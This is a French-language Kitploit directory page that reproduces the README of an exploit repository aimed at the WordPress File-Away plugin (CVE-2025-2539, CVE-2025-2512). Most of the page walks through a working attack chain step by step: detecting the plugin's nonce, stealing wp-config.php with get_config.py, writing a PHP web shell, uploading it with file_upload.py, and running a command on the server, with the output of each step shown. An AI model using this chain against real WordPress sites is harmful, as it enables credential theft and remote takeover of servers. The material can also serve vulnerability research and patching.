Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
file-away-exploit — Scripts d'exploit d'exécution de code à distance pour le plugin WordPress File-Away (CVE-2025-2512 & CVE-2025-2539) | Kitploit
Outils/GitHubGitHub/whattheslime/file-away-exploit
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubwhattheslime/file-away-exploit

file-away-exploit

Scripts d'exploit d'exécution de code à distance pour le plugin WordPress File-Away (CVE-2025-2512 & CVE-2025-2539)

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Site web
Partager

Exploit File-Away (CVE-2025-2539 & CVE-2025-2512)

📌 Objectif

Ce dépôt contient les détails des vulnérabilités et les scripts trouvés dans File-Away, un plugin WordPress utilisé pour la gestion de fichiers.

Ce plugin contient deux vulnérabilités pouvant mener à une exécution de code à distance (Testé sur File-Away 3.9.9.0.1) :

  • CVE-2025-2539 : Lecture arbitraire de fichier non authentifiée
  • CVE-2025-2512 : Téléversement arbitraire de fichier non authentifié

📖 Lecture arbitraire de fichier non authentifiée

Le plugin File-Away pour WordPress est vulnérable à une lecture arbitraire de fichier non authentifiée dans toutes les versions jusqu'à la 3.9.9.0.1 incluse.

Cette vulnérabilité existe à cause de deux problèmes : l'absence de vérification d'authentification dans la fonction lib/cls/class.fileaway_stats.php:file_away_stats->ajax() et l'utilisation d'un algorithme de chiffrement faible dans la fonction lib/cls/class.fileaway_encrypted.php:fileaway_encrypted->encrypt().

Cela permet à des attaquants non authentifiés de lire des fichiers arbitraires, y compris le fichier de configuration WordPress (wp-config.php).

📁 Téléversement arbitraire de fichier non authentifié

Le plugin File-Away pour WordPress est vulnérable à un téléversement arbitraire de fichier non authentifié dans toutes les versions jusqu'à la 3.9.9.0.1 incluse.

Cette vulnérabilité existe à cause de deux problèmes : l'absence de vérification d'authentification et la mauvaise vérification du type de fichier, tous deux dans la fonction lib/cls/class.fileaway_management.php:fileaway_management->upload().

Cela permet à des attaquants non authentifiés de téléverser des fichiers arbitraires pouvant mener à une exécution de code.

🔍 Détection

Si le plugin file-away est installé et activé sur l'instance WordPress ciblée, le nonce fileaway_stats devrait être présent sur la page d'index :

root@kitploit:~
curl -sk http://127.0.0.1:8000/ | grep -E '^var fileaway_stats.*nonce\":\"([a-f0-9]+)\"};$'
root@kitploit:~
var fileaway_stats = {"ajaxurl":"http:\/\/127.0.0.1:8000\/wp-admin\/admin-ajax.php","nonce":"ff57064c96"};

🐞 Étapes d'exploitation

  1. Installer les prérequis python :

    root@kitploit:~
    python3 -m venv venv && venv/bin/pip install httpx
    
  2. Utiliser la vulnérabilité de lecture arbitraire de fichier pour obtenir le fichier de configuration de l'instance WordPress (wp-config.php) :

    root@kitploit:~
    venv/bin/python3 get_config.py -t http://127.0.0.1:8000
    
    root@kitploit:~
    [+] File-Away nonce:          ff57064c96
    [-] Encrypted web root:       LcZh3iec7c3vfHRt2C8=
    [-] Decoder:                  .i%B7%1Dy%F8%21%8A9%25%9Az%29%AA%BB-%BA%FC1%CB%3D5%DB~9%EB%BF%3D
    [-] Charset:                  abcdefghijklmnopqrstuvwxyz0123456789
    [+] Encryption Key:           f2379aghijklmnopqrstuvwxyz65bc410d8e
    [+] Decrypted web root:       /var/www/html
    [+] Config file downloaded:   127.0.0.1:8000_wp-config.php
    
  3. Créer un fichier PHP à téléverser :

    root@kitploit:~
    echo '<?php system("id"); ?>' > /tmp/exec.php
    
  4. Utiliser la pour téléverser le fichier sur le serveur :

Télécharger l’outil
vulnérabilité de téléversement arbitraire de fichier
PHP
root@kitploit:~
venv/bin/python3 file_upload.py -t http://127.0.0.1:8000 -c 127.0.0.1:8000_wp-config.php -w /var/www/html/ -f /tmp/exec.php
root@kitploit:~
[-] nonce:            4810861b18
[-] upload_nonce:     0c3f44ae83
[-] loc_nonce:        a17a2df989
[+] File uploaded:    http://127.0.0.1:8000/wp-content/exec.php

⚠️ Le fichier est téléversé dans le répertoire wp-content par défaut ⚠️

  • Accéder au fichier PHP téléversé :

    root@kitploit:~
    curl -sk http://127.0.0.1:8000/wp-content/exec.php
    
    root@kitploit:~
    uid=33(www-data) gid=33(www-data) groups=33(www-data)